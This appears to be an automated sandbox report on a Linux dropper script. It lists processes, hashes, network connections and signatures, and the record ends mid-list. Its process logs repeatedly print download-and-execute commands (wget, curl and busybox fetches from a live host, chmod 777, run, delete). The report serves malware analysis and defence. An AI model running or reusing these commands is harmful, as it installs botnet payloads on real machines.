/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/chmod

[chmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a

[./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/rm

[rm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/wget

[wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/chmod

[chmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr

[./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/rm

[rm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/wget

[wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/chmod

[chmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ

[./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/rm

[rm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/wget

[wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/chmod

[chmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g

[./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/rm

[rm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/wget

[wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/chmod

[chmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs

[./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/rm

[rm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/wget

[wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/chmod

[chmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW

[./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/rm

[rm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/wget

[wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/chmod

[chmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6

[./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/rm

[rm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/wget

[wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/chmod

[chmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv

[./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/rm

[rm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/wget

[wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/chmod

[chmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC

[./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/rm

[rm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/wget

[wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/chmod

[chmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4

[./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/rm

[rm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/wget

[wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/chmod

[chmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a

[./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/rm

[rm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/wget

[wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/chmod

[chmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q

[./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/rm

[rm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/chmod

[chmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

[./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/rm

[rm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/wget

[wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/chmod

[chmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr

[./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/rm

[rm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/wget

[wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/chmod

[chmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu

[./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/rm

[rm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/842-1-0xb66c6000-0xb66d7044-memory.dmp

memory/848-2-0xb6784000-0xb6795044-memory.dmp

memory/869-3-0xb66e8000-0xb66f9044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 02:59

Reported

2024-10-18 03:01

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

155s

Command Line

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A

Processes

/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/chmod

[chmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

[./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/rm

[rm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/wget

[wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/chmod

[chmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr

[./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/rm

[rm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/wget

[wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/chmod

[chmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu

[./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/rm

[rm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/wget

[wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/chmod

[chmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr

[./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/rm

[rm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/wget

[wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/chmod

[chmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ

[./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/rm

[rm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/wget

[wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/chmod

[chmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g

[./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/rm

[rm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/wget

